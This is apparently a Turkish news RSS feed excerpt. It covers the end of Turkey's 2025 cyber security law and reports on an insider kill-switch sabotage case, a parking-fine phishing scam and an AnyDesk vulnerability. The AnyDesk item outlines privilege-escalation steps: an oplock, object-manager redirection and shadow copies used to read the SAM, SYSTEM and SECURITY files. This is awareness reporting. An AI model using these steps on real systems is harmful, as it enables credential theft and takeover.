<p class="Metin"><b><span>MADDE 17- </span></b><span>(1) İdari para cezalarının uygulanmasından önce ilgilinin savunması alınır. Savunma istendiğine ilişkin yazının tebliğ tarihinden itibaren otuz gün içinde savunma verilmemesi halinde, ilgilinin savunma hakkından feragat ettiği kabul edilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanunda tanımlanan kabahatlerden birinin idari yaptırım kararı verilinceye kadar birden çok işlendiğinin tespit edilmesi halinde ilgili gerçek veya tüzel kişiye tek idari para cezası verilir ve verilecek ceza iki katını aşmayacak şekilde artırılarak uygulanır. Kabahatin işlenmesi nedeniyle bir menfaat temin edilmesi veya zarara sebebiyet verilmesi halinde verilecek idari para cezasının miktarı bu menfaat veya zararın üç katından az beş katından fazla olamaz.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Başkanlık tarafından verilen idari para cezaları, tebliğ tarihinden itibaren bir ay içinde ödenir. Bu süre içinde ödenmeyen ve kesinleşen idari para cezaları, Kurumun bildirimi üzerine <span class="GramE">21/7/1953</span> tarihli ve 6183 sayılı Amme Alacaklarının Tahsil Usulü Hakkında Kanun hükümlerine göre vergi dairelerince tahsil edilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Tahsil edilen idari para cezalarının yüzde ellisi Başkanlık bütçesine, yüzde ellisi genel bütçeye gelir kaydedilir. Başkanlığın tahsil ettiği idari para cezalarından ayrılan genel bütçe payı; vergi dairesince tahsil edilen idari para cezalarından ayrılan Başkanlık payı, <span class="GramE">tahsilatı</span> takip eden ay sonuna kadar aktarılır.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Bu Kanun uyarınca verilen idari para cezası kararlarına karşı idari yargı yoluna başvurulabilir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>ALTINCI BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Çeşitli ve Son Hükümler<o:p></o:p></span></p>
<p class="Metin"><b><span>Siber güvenlik ürünleri ve şirketleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 18- </span></b><span>(1) Siber güvenlik ürün, sistem, yazılım, donanım ve hizmetlerin yurt dışına satışı, Başkanlıkça belirlenecek usul ve esaslara uygun olarak yapılır. Bu usul ve esaslarda yer alacak izne tabi ürünlerin yurt dışına satışında Başkanlık onayı alınır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Siber güvenlik ürün, sistem, yazılım, donanım ve hizmetleri üreten şirketlerin birleşme, bölünme, pay devri veya satış işlemleri Başkanlığa bildirilir. Bu işlemler kapsamında gerçek veya tüzel kişilere münferiden veya birlikte şirket üzerinde doğrudan veya dolaylı kontrol hakkı veya karar alma yetkisi sağlayan işlemler Başkanlık onayına tabidir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Başkanlık onayı alınmaksızın gerçekleştirilen işlemler hukuki bir geçerlilik kazanmaz. Başkanlık, bu madde kapsamında yapılacak işlemlerle ilgili olarak kurum ve kuruluşlardan bilgi ve belge talep edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Bu maddenin uygulanmasına ilişkin hususlar Başkanlık tarafından yayımlanacak usul ve esaslar ile belirlenir.<o:p></o:p></span></p>
<p class="Metin"><b><span>Değiştirilen ve yürürlükten kaldırılan hükümler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 19- </span></b><span>(1) <span class="GramE">27/6/1989</span> tarihli ve 375 sayılı Kanun Hükmünde Kararnamenin ek 34 üncü maddesinin üçüncü fıkrasına aşağıdaki cümle eklenmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“Siber Güvenlik Başkanı, mali ve sosyal hak ve yardımlar ile emeklilik hakları bakımından, bu fıkrada belirtilen usul ve esaslar çerçevesinde bakanlık müsteşarına denk kabul edilir.”<o:p></o:p></span></p>
<p class="Metin"><span>(2) <span class="GramE">10/12/2003</span> tarihli ve 5018 sayılı Kamu Malî Yönetimi ve Kontrol Kanununa ekli (II) sayılı Cetvelin “B) Özel Bütçeli Diğer İdareler” bölümüne aşağıdaki satır eklenmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“46) Siber Güvenlik Başkanlığı”<o:p></o:p></span></p>
<p class="Metin"><span>(3) <span class="GramE">4/5/2007</span> tarihli ve 5651 sayılı İnternet Ortamında Yapılan Yayınların Düzenlenmesi ve Bu Yayınlar Yoluyla İşlenen Suçlarla Mücadele Edilmesi Hakkında Kanunun 10 uncu maddesinin altıncı fıkrası aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“(6) Kurum, görevleri kapsamında, içerik, yer, erişim sağlayıcılar ve ilgili diğer kurum ve kuruluşlarla koordinasyon sağlar, gerekli tedbirlerin aldırılması konusunda faaliyet yürütür ve ihtiyaç duyulan çalışmaları yapar.”<o:p></o:p></span></p>
<p class="Metin"><span>(4) <span class="GramE">5/11/2008</span> tarihli ve 5809 sayılı Elektronik Haberleşme Kanununun;<o:p></o:p></span></p>
<p class="Metin"><span>a) 5 inci maddesinin birinci fıkrasının (h) bendi yürürlükten kaldırılmış ve (ı) bendi aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>“ı) Bakanlığın yürüttüğü görevler kapsamındaki veri ve sistemlerin barındırılacağı veri merkezleri ve verilerin transferi için gerekli altyapıları kurmak, kurdurmak, işletmek, işlettirmek, bu merkezlere yönelik politika, strateji ve hedefleri belirlemek, eylem planlarını hazırlamak, eylem planlarını izlemek ve tüm bu faaliyetlere yönelik uygulama usul ve esaslarını belirlemek, kurulum, uygulama ve işletim süreçlerini planlamak, yürütmek ve koordine etmek.”</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>b) 6 <span class="SpellE">ncı</span> maddesinin birinci fıkrasının (v) bendi aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“v) İnternet alan adları ve Kurum görevleri konularında Cumhurbaşkanı ve Bakanlık tarafından verilen görevleri yerine getirmek.”<o:p></o:p></span></p>
<p class="Metin"><span>c) 60 <span class="SpellE">ıncı</span> maddesinin <span class="SpellE">onbirinci</span> fıkrası ile ek 1 inci ve ek 2 <span class="SpellE">nci</span> maddeleri yürürlükten kaldırılmıştır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Uyum, geçiş düzenlemeleri ve kuruluş işlemleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>GEÇİCİ MADDE 1- </span></b><span>(1) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığına ve Dijital Dönüşüm Ofisine ait ve münhasıran ulusal siber güvenlik faaliyetleri kapsamında kullanılan her türlü taşınır, bilgi işlem altyapısı ve sistemler, taşıt, araç, gereç ve malzeme, fiziki ve elektronik ortamdaki her türlü kayıt ve doküman ile diğer her türlü varlık <span class="GramE">envanteri</span> ile mezkûr Başkanlık ve Ofis tarafından söz konusu faaliyetlerin yürütülmesinden doğan her türlü borç ve alacaklar, hak ve yükümlülükler, Siber Güvenlik Başkanlığına bu Kanunun yayımından itibaren altı ay içerisinde devredilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığının ve Dijital Dönüşüm Ofisinin kadro ve pozisyonlarında bulunan personelden ulusal siber güvenlik faaliyetleri kapsamında çalışanlar, taleplerinin bulunması ve Siber Güvenlik Başkanlığınca uygun görülmesi halinde Başkanlıkta görevlendirilebilirler. Bunlardan talepte bulunan ve Başkanlıkça uygun görülenler mevcut kadro veya pozisyon unvanları ve öğrenim durumları dikkate alınarak bu Kanunun yayımından itibaren dokuz ay içerisinde Başkanlıkta durumlarına uygun kadro veya pozisyonlara atanabilirler. Bu fıkra kapsamında ataması yapılan personelin önceki kurumlarında veya kadrolarında geçirdikleri süreler yeni kurumlarında veya kadrolarında geçirilmiş sayılır. Bu fıkra kapsamında ataması yapılan personelden mali hakları hususunda haklarında 375 sayılı Kanun Hükmünde Kararnamenin geçici 10 uncu maddesi veya ilgili diğer mevzuat hükümleri uygulananlar hakkında anılan düzenlemelerin uygulanmasına devam edilir. Dijital Dönüşüm Ofisinden bu fıkra kapsamında ataması yapılan personele, iş mevzuatına göre herhangi bir tazminat ve yıllık izin ücreti ödenmez. Bu personelin önceden kıdem tazminatı ödenmiş süreleri hariç kıdem tazminatına hak kazanacak şekilde geçmiş olan hizmet süreleri, ilgisine göre emekli ikramiyelerinin veya iş sonu tazminatının hesabında dikkate alınır. Ayrıca, bu personele bu fıkraya göre atanmadan önce ilave tediye veya ikramiye ödenmiş olması halinde ödenen tutarların atamanın yapıldığı tarihten sonraki çalışılmayan günlere tekabül eden kısmı geri alınır.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığının ve Dijital Dönüşüm Ofisinin ulusal siber güvenlik faaliyetleri ile ilgili yapılmış olan sözleşmeler, açılmış ve açılacak olan davalar ve icra işlemlerinde ikinci fıkradaki atama işlemlerinin tamamlanması tarihi itibarıyla Başkanlık taraf sıfatını kazanır, mevcut dava dosyaları ve icra takiplerine ilişkin dosyalar Başkanlığa devredilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Siber güvenlik alanında faaliyet icra eden dernek, derneklerden oluşan federasyonlar, vakıflar ile ticaret şirketleri, altıncı fıkrada belirtilen düzenlemelerin yürürlüğe girmesinden itibaren bir yıl içerisinde Başkanlığın belirlediği ilke ve esaslar çerçevesinde sertifikasyon, yetkilendirme ve belgelendirme işlemlerini tamamlamakla yükümlüdürler. Bu yükümlülüğün yerine getirilmemesi halinde siber güvenlik alanında faaliyette bulunulamaz. Bu süre sonunda söz konusu yükümlülüklerini yerine getirmeyen dernek, vakıf ve federasyonların tüzel kişiliklerine, Başkanlığın talebi üzerine <span class="GramE">22/11/2001</span> tarihli ve 4721 sayılı Türk Medenî Kanununun ilgili hükümlerine göre mahkeme kararıyla son verilir ve mahkeme tarafından yargılama sürecinde gerekli tedbirler alınır. Ticaret şirketleri ise aynı süre içinde yükümlülüklerini yerine getirmediği takdirde ticaret unvanlarında ve faaliyet konularında yer alan siber güvenliğe ilişkin ibareleri şirket sözleşmelerinden çıkarır veya ticaret sicilinden terkin edilmeleri amacıyla tasfiye süreçlerini başlatır.<o:p></o:p></span></p>
<p class="Metin"><span>(5) 19 uncu maddenin üçüncü ve dördüncü fıkraları uyarınca yürürlükten kaldırılan hükümler kapsamında faaliyet gösteren kurumlar Başkanlığın teşkilatlanmasının tamamlanmasına kadar anılan hükümler çerçevesinde görevlerini yürütmeye devam ederler.<o:p></o:p></span></p>
<p class="Metin"><span>(6) Bu Kanunun uygulanmasına ilişkin düzenlemeler, bir yıl içinde yürürlüğe konulur. Bu düzenlemeler yürürlüğe girinceye kadar mevcut düzenlemelerin bu Kanuna aykırı olmayan hükümlerinin uygulanmasına devam olunur.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yürürlük<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 20- </span></b><span>(1) Bu Kanun yayımı tarihinde yürürlüğe girer.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yürütme<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 21- </span></b><span>(1) Bu Kanun hükümlerini Cumhurbaşkanı yürütür.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>18/3/2025</span></p>
<p><b>Kaynak: <a href="https://beykozunsesi.com.tr/turkiyenin-ilk-siber-guvenlik-kanunu-yururluge-girdi" target="_blank" rel="noopener">Beykozun Sesi</a></b></p>
<p></p>
<p><b>Ajans Expres Gazetesi</b></p>
<p><iframe width="1280" height="720" src="https://www.youtube.com/embed/7yzo9f76x_4" title="Türkiye'nin İlk Siber Güvenlik Kanunu Yürürlüğe Girdi" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"></iframe></p>]]> </content:encoded>
</item>

<item>
<title>Eski Çalışanı Tarafından Sabotaja Uğrayan Şirketin Sistemleri Çöktü</title>
<link>https://www.ajansexpres.com.tr/eski-calisani-tarafindan-sabotaja-ugrayan-sirketin-sistemleri-coektu</link>
<guid>https://www.ajansexpres.com.tr/eski-calisani-tarafindan-sabotaja-ugrayan-sirketin-sistemleri-coektu</guid>
<description><![CDATA[ ABD&#039;de bir yazılım geliştiricisi, eski çalıştığı şirketin sistemlerini sabote etmekten suçlu bulundu. Şirketin ağlarına kötü amaçlı yazılım yükleyen ve &#039;kill switch&#039; kodu ile binlerce çalışanın erişimini engelleyen Davis Lu, 10 yıla kadar hapis cezasıyla karşı karşıya. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202503/image_870x580_67cebf471b6e2.webp" length="55504" type="image/jpeg"/>
<pubDate>Mon, 10 Mar 2025 13:31:48 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Davis Lu neden şirketin sistemlerini sabote etti, kill switch nasıl çalıştı, sabotajın şirkete maliyeti ne kadar oldu, Lu ne kadar hapis cezası alabilir</media:keywords>
<content:encoded><![CDATA[<p data-start="375" data-end="701">ABD'nin Houston kentinde yaşayan 55 yaşındaki yazılım geliştiricisi Davis Lu, eski işvereni Eaton Corporation’a ait bilgisayar sistemlerini sabote etmekten suçlu bulundu. Lu'nun, şirketteki görevlerini kaybettikten sonra özel olarak yazdığı kötü amaçlı yazılımlar ile sistemleri çökerttiği ortaya çıktı.</p>
<p data-start="703" data-end="764"><strong data-start="703" data-end="762">'Kill Switch' ile Binlerce Çalışanı Erişim Dışı Bıraktı</strong></p>
<p data-start="766" data-end="1066">Eaton Corporation, elektrik, hidrolik ve mekanik sistemler üzerine küresel çapta faaliyet gösteren bir güç yönetimi şirketi olarak biliniyor. Davis Lu, 2007 yılından 2019’a kadar şirketin Ohio’daki merkezinde çalıştı. Ancak 2018’de gerçekleşen bir kurumsal yapılanma sonrasında yetkileri azaltıldı.</p>
<p data-start="1068" data-end="1382">Lu, şirketteki bilgisayarlara 'sonsuz döngü' (infinite loop) içeren kötü amaçlı kodlar ekleyerek sistemlerin aşırı yüklenmesine ve çökmelerine neden oldu. Bu kodlar, Java iş parçacıklarını (threads) sürekli olarak yeniden oluşturarak sunucunun kaynaklarını tüketiyor ve çalışanların giriş yapmasını engelliyordu.</p>
<p data-start="1384" data-end="1817">Bunun yanı sıra Lu'nun, iş arkadaşlarının kullanıcı profillerini sildiği ve 'kill switch' adı verilen bir sistem yerleştirdiği belirlendi. 'IsDLEnabledinAD' olarak adlandırılan bu kod, Lu’nun Active Directory hesabı devre dışı bırakıldığında otomatik olarak çalışarak binlerce çalışanın sistem erişimini kesti. Bu mekanizma, Lu'nun 9 Eylül 2019'da işten çıkarılmasıyla tetiklendi ve şirket genelinde büyük bir kesintiye neden oldu.</p>
<p data-start="1819" data-end="1855"><strong data-start="1819" data-end="1853">Hapis Cezası ile Karşı Karşıya</strong></p>
<p data-start="1857" data-end="2151">ABD Adalet Bakanlığı tarafından yürütülen soruşturma kapsamında, Lu'nun internet arama geçmişinde, yetki yükseltme, süreç gizleme ve dosyaları hızla silme yöntemlerine dair araştırmalar yaptığı da tespit edildi. Yetkililer, bu sabotajın şirkete yüz binlerce dolarlık zarar verdiğini belirtti.</p>
<p data-start="2153" data-end="2349">Jüri, Lu'yu 'korunan bilgisayarlara kasıtlı zarar verme' suçlamasıyla mahkum etti. Bu suçun azami cezası 10 yıl hapis olarak belirlenmiş olsa da, henüz kesinleşmiş bir mahkeme kararı bulunmuyor.</p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD’de Sahte Otopark Cezası Mesajları Yayılıyor: Şehirlerden Uyarı</title>
<link>https://www.ajansexpres.com.tr/abdde-sahte-otopark-cezasi-mesajlari-yayiliyor-sehirlerden-uyari</link>
<guid>https://www.ajansexpres.com.tr/abdde-sahte-otopark-cezasi-mesajlari-yayiliyor-sehirlerden-uyari</guid>
<description><![CDATA[ ABD&#039;nin birçok şehrinde, sürücülere sahte otopark cezası mesajları gönderilerek dolandırıcılık yapıldığı tespit edildi. Gönderenin resmi otoriteler gibi göründüğü mesajlar, kullanıcılardan sahte sitelere yönlendirilerek kişisel ve finansal bilgilerini çalmayı hedefliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202503/image_870x580_67ceb6dc7a73b.webp" length="34122" type="image/jpeg"/>
<pubDate>Mon, 10 Mar 2025 12:55:09 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>ABD’de sahte otopark cezası mesajları nasıl yayılıyor, dolandırıcılar hangi yöntemleri kullanıyor, sahte mesajları nasıl tespit edebilirsiniz, kişisel bilgileriniz nasıl korunabilir</media:keywords>
<content:encoded><![CDATA[<p data-start="376" data-end="790"></p>
<p data-start="376" data-end="790">ABD genelinde birçok şehir, sürücüleri hedef alan yeni bir mobil kimlik avı (phishing) saldırısına karşı uyarıda bulundu. Sahte mesajlar, belediyelerin otopark ihlalleriyle ilgili resmi birimi gibi davranarak, sürücülere ödenmemiş park cezaları olduğu yönünde bildirimler gönderiyor. Mesajda, belirtilen cezanın gününde ödenmemesi halinde günlük 35 dolarlık ek ücret ekleneceği belirtiliyor.</p>
<p data-start="792" data-end="1040">Bu dolandırıcılık yöntemi, New York, Boston, Detroit, Houston, San Diego, San Francisco gibi büyük şehirlerde yoğun olarak görülüyor. Aralık ayından bu yana devam eden saldırılar, sahte bağlantılar aracılığıyla kullanıcıları kandırmayı amaçlıyor.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202503/image_870x_67ce4aa8bdc02.webp" alt=""></p>
<p data-start="1042" data-end="1088"><strong data-start="1042" data-end="1086">Sahte Sitelerle Bilgiler Ele Geçiriliyor</strong></p>
<p data-start="1090" data-end="1394">Dolandırıcılar, kullanıcıları kandırmak için Google’ın açık yönlendirme (open redirect) özelliğini kullanıyor. Güvenilir bir alan adı olan Google.com üzerinden yönlendirme yapıldığı için, iPhone’larda iMessage tarafından engellenmeyen bu bağlantılar, kullanıcıları sahte ödeme sitelerine yönlendiriyor.</p>
<p data-start="1396" data-end="1680">Örneğin, New York için oluşturulan sahte web sitesi "nycparkclient[.]com" adresi üzerinden hizmet veriyor gibi görünüyor. Kullanıcılar, isimlerini ve posta kodlarını girdiklerinde, borçlu oldukları iddia edilen tutar ekrana getiriliyor ve "Ödeme Yap" butonuna tıklamaları isteniyor.</p>
<p data-start="1682" data-end="1900">Ancak dolandırıcılığın en belirgin işaretlerinden biri, ödeme ekranındaki yazım hataları. ABD’de genellikle dolar işareti ($) rakamın önüne yazılırken, bu sahte sitelerde rakamın sonuna eklenmiş şekilde kullanılıyor.</p>
<p data-start="1902" data-end="1949"><strong data-start="1902" data-end="1947">Kredi Kartı ve Kişisel Bilgiler Çalınıyor</strong></p>
<p data-start="1951" data-end="2180">Kurbanlar ödeme adımına geçtiğinde, dolandırıcılar isim, adres, telefon numarası, e-posta ve kredi kartı bilgilerini talep ediyor. Bu veriler, kimlik hırsızlığı, finansal dolandırıcılık ve diğer siber suçlarda kullanılabiliyor.</p>
<p data-start="2182" data-end="2366">Yetkililer, beklenmedik bir numaradan gelen mesajlara karşı dikkatli olunması, şüpheli bağlantılara tıklanmaması ve bu tür mesajların yetkililere bildirilmesi gerektiğini vurguluyor.</p>
<p></p>
<p><b>Kaynak: <a href="https://beykozunsesi.com.tr/abdde-sahte-otopark-cezasi-mesajlari-yayiliyor-sehirlerden-uyari" target="_blank" rel="noopener">Beykozun Sesi</a></b></p>
<p></p>
<p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>AnyDesk Kullananlar Dikkat! Bu Açıkla Bilgisayarınız Ele Geçirilebilir</title>
<link>https://www.ajansexpres.com.tr/anydesk-kullananlar-dikkat-bu-acikla-bilgisayariniz-ele-gecirilebilir</link>
<guid>https://www.ajansexpres.com.tr/anydesk-kullananlar-dikkat-bu-acikla-bilgisayariniz-ele-gecirilebilir</guid>
<description><![CDATA[ Windows&#039;taki AnyDesk uygulamasında kritik bir güvenlik açığı keşfedildi! CVE-2024-12754 koduyla duyurulan bu açık, saldırganların sistem yetkisi elde etmesine olanak tanıyor. Düşük ayrıcalıklı bir kullanıcı, bu zafiyeti kullanarak yönetici hakları kazanabiliyor. Detaylar ve korunma yöntemleri haberimizde! ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202502/image_870x580_67b11262388fe.webp" length="50958" type="image/jpeg"/>
<pubDate>Sun, 16 Feb 2025 01:17:52 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>AnyDesk CVE-2024-12754 açığı nasıl çalışıyor, AnyDesk güvenlik açığı ile sistem yetkisi nasıl ele geçiriliyor, Windows’ta ShadowCopy mekanizması nasıl kullanılıyor, CVE-2024-12754 için hangi önlemler alınmalı</media:keywords>
<content:encoded><![CDATA[<p data-start="617" data-end="839">Popüler uzaktan erişim yazılımı AnyDesk'te kritik bir güvenlik açığı tespit edildi. CVE-2024-12754 koduyla duyurulan bu açık, saldırganların sistem dosyalarına erişmesini ve yönetici ayrıcalıkları elde etmesini sağlıyor.</p>
<p data-start="841" data-end="898"><strong data-start="841" data-end="896">Dosya Kopyalama Mekanizması Kötüye Kullanılabiliyor</strong></p>
<p data-start="900" data-end="1326">Güvenlik araştırmacısı Naor Hodorov tarafından keşfedilen açık, Windows işletim sisteminde çalışan AnyDesk hizmetinin NT AUTHORITY\SYSTEM yetkileriyle dosya kopyalama işlemi gerçekleştirmesini temel alıyor. AnyDesk, yeni bir oturum başlatıldığında mevcut masaüstü arka planını <code data-start="1177" data-end="1194">C:\Windows\Temp</code> klasörüne kopyalıyor. Bu işlem, düşük ayrıcalıklı bir kullanıcının belirli dosyaları kontrol etmesine ve okumasına imkan tanıyor.</p>
<p data-start="1328" data-end="1379"><strong data-start="1328" data-end="1377">Yetkisiz Dosya Erişimi ve Ayrıcalık Yükseltme</strong></p>
<p data-start="1381" data-end="1816">Düşük yetkili bir kullanıcı, masaüstü arka planını değiştirerek hangi dosyanın <code data-start="1460" data-end="1477">C:\Windows\Temp</code> dizinine kopyalanacağını kontrol edebilir. Ancak, bu kopyalama işlemi sonucunda yeni dosya yalnızca sistem yöneticileri ve NT AUTHORITY\SYSTEM tarafından okunabilir hale geliyor. Bu sınırlamayı aşmak için, saldırgan aynı ada sahip bir dosyayı önceden <code data-start="1729" data-end="1746">C:\Windows\Temp</code> dizinine yerleştirebilir ve bu sayede kopyalanan veriye erişebilir.</p>
<p data-start="1818" data-end="2065">Ayrıca, Windows'un otomatik olarak oluşturduğu <strong data-start="1865" data-end="1893">HarddiskVolumeShadowCopy</strong> (Gölge Kopyalar) mekanizmasından yararlanılarak sistem dosyalarına erişim sağlanabiliyor. Saldırganlar, aşağıdaki adımları izleyerek yerel ayrıcalıklarını yükseltebilir:</p>
<ol data-start="2067" data-end="2472">
<li data-start="2067" data-end="2148"><code data-start="2070" data-end="2087">C:\Windows\Temp</code> klasöründe hedef dosya adıyla önceden bir dosya oluşturma.</li>
<li data-start="2149" data-end="2216">Oplock (Dosya Kilidi) kullanarak kopyalama işlemini tetikleme.</li>
<li data-start="2217" data-end="2305">Arka plan görüntüsünün bulunduğu klasörü NT Object Manager Namespace'e yönlendirme.</li>
<li data-start="2306" data-end="2397"><strong data-start="2309" data-end="2316">SAM</strong>, <strong data-start="2318" data-end="2328">SYSTEM</strong> ve <strong data-start="2332" data-end="2344">SECURITY</strong> dosyalarına erişmek için gölge kopyaları kullanma.</li>
<li data-start="2398" data-end="2472">Elde edilen verileri kullanarak yönetici ayrıcalıklarını ele geçirme.</li>
</ol>
<p data-start="2474" data-end="2506"><strong data-start="2474" data-end="2504">Zafiyetin Açıklanma Süreci</strong></p>
<p data-start="2508" data-end="2880">Bu güvenlik açığı, 24 Temmuz 2024'te AnyDesk geliştiricilerine bildirildi. Trend Micro'nun <strong data-start="2599" data-end="2628">Zero Day Initiative (ZDI)</strong> programı kapsamında takip edilen süreç sonunda, 19 Aralık 2024'te kamuoyuna duyuruldu. Açığın CVE ve ZDI detaylarına şu bağlantıdan ulaşılabilir:<br data-start="2774" data-end="2777"><strong data-start="2780" data-end="2878"><a data-start="2782" data-end="2876" rel="noopener" target="_blank" href="https://www.zerodayinitiative.com/advisories/ZDI-24-1711/">Detay linki</a></strong></p>
<p data-start="2882" data-end="3052">Güvenlik açığının kötüye kullanılmasını önlemek için AnyDesk kullanıcılarının güncellemeleri takip etmeleri ve sistem güvenlik ayarlarını gözden geçirmeleri öneriliyor.</p>
<p></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Uzmanı Osman Doğan: &amp;apos;Siber Güvenlik Hayatta Kalmanın Tek Yolu&amp;apos;</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-osman-dogan-siber-guvenlik-hayatta-kalmanin-tek-yolu</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-osman-dogan-siber-guvenlik-hayatta-kalmanin-tek-yolu</guid>
<description><![CDATA[ Siber Güvenlik Uzmanı Osman Doğan, 2024 yılında sahada tespit edilen güvenlik açıklarını ve yaşanan hack vakalarını değerlendirdi. Yetki kısıtlamaları, bütçe yetersizlikleri, sızma testlerinin eksikliği ve güvenlik mekanizmalarındaki zafiyetler, kurumları ciddi risklerle karşı karşıya bırakıyor. Doğan, siber güvenliğin bir lüks değil, dijital dünyada hayatta kalmanın tek yolu olduğunu vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202502/image_870x580_67a51900e72a3.webp" length="64328" type="image/jpeg"/>
<pubDate>Thu, 06 Feb 2025 23:18:23 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Siber güvenlik uzmanı Osman Doğan hangi risklere dikkat çekti, 2024’te en çok karşılaşılan güvenlik açıkları neler, sızma testleri neden yeterli değil, siber güvenlik tüm çalışanları neden ilgilendiriyor</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik alanında 2024 yılı, birçok kurum için büyük tehditlerle karşı karşıya kalınan bir yıl oldu. Bu kapsamda sahada tespit edilen güvenlik açıkları ve yaşanan siber saldırılarla ilgili değerlendirmelerde bulunan <a href="https://www.gaissecurity.com/" target="_blank" rel="noopener">Gais Security</a> CEO'su Osman Doğan organizasyonlardaki yapısal eksikliklere dikkat çekti.</p>
<p><strong>Siber güvenlik birimlerinin yetkileri kısıtlı</strong><br>Osman Doğan, birçok kurumda siber güvenlik birimlerinin organizasyon içerisindeki yetkilerinin kısıtlı olduğunu belirterek, 'Riskleri minimize edecek önlemler alınamıyor, çünkü siber güvenlik ekiplerinin yeterli otoriteye sahip olması engelleniyor' dedi.</p>
<p><strong>Bütçe ve insan kaynağı yetersizliği büyük sorun</strong><br>Doğan, siber güvenlik departmanlarına ayrılan bütçelerin yetersiz olduğunu ve bu durumun insan kaynağı eksikliğiyle birleşerek güvenlik açıklarını daha da artırdığını ifade etti. 'Firmalar, artan siber tehditlere rağmen yeterli bütçeyi ve uzman kadroyu ayırmıyor' şeklinde konuştu.</p>
<p><strong>Sızma testleri yetersiz kalıyor</strong><br>Siber güvenlik uzmanı, birçok organizasyonun yılda yalnızca bir kez sızma testi yaptırmasının yeterli olmadığını vurguladı. 'Dijital varlıklar sürekli gelişiyor, ancak firmalar güvenlik testlerini düzenli hale getirmediği için büyük riskler doğuyor' dedi.</p>
<p><strong>DevSecOps süreçlerinde ciddi eksiklikler var</strong><br>Doğan, güvenli yazılım geliştirme süreçlerinde ciddi eksiklikler bulunduğunu belirterek, 'Otomatize ve manuel testlerin yetersizliği, güvenlik açıklarının önceden tespit edilmesini engelliyor' ifadelerini kullandı.</p>
<p><strong>Veri sızıntıları ve içeriden gelen tehditler tespit edilemiyor</strong><br>Osman Doğan, mevcut güvenlik açıklarının yalnızca dış tehditlerden ibaret olmadığını, içeriden gelen tehditlerin ve veri sızıntılarının da ciddi bir sorun oluşturduğunu söyledi. 'Birçok kurum, yaşanan veri ihlallerini sosyal medya veya üçüncü taraf kaynaklardan öğreniyor' dedi.</p>
<p><strong>Zararlı yazılımlar ve güvenlik çözümlerindeki eksiklikler</strong><br>Şirket çalışanlarına gönderilen dökümanlarda bulunan zararlı yazılımların, mevcut güvenlik çözümlerindeki eksiklikler veya yanlış konfigürasyonlar nedeniyle tespit edilemediğini belirten Doğan, 'Bu hatalar, saldırganların sistemlere erişimini kolaylaştırıyor' ifadelerini kullandı.</p>
<p><strong>Bulut sistemlerde yapılandırma hataları yaygın</strong><br>Cloud tabanlı sistemlerde yapılan yapılandırma hataları, yanlış network segmentasyonları ve eksik erişim kontrol mekanizmalarının büyük güvenlik riskleri oluşturduğunu belirten Doğan, şirketlerin bu konuda daha dikkatli olması gerektiğini söyledi.</p>
<p><strong>Siber güvenlik bir kültür haline gelmeli</strong><br>Osman Doğan, siber güvenliğin sadece ilgili departmanların sorumluluğunda olmaması gerektiğini belirterek, 'Şirketlerin güvenlik farkındalığını tüm çalışanlarına yayması gerekiyor. Siber güvenlik bir lüks değil, dijital dünyadaki savaşta hayatta kalmanın tek yoludur' dedi.</p>
<p><strong>Haberi Yapan: Ebubekir Bastama</strong></p>]]> </content:encoded>
</item>

<item>
<title>Instagram Reklamları Üzerinden Yeni Dolandırıcılık Yöntemi: Kullanıcı Bilgileri Hedefte</title>
<link>https://www.ajansexpres.com.tr/instagram-reklamlari-uzerinden-yeni-dolandiricilik-yoentemi-kullanici-bilgileri-hedefte</link>
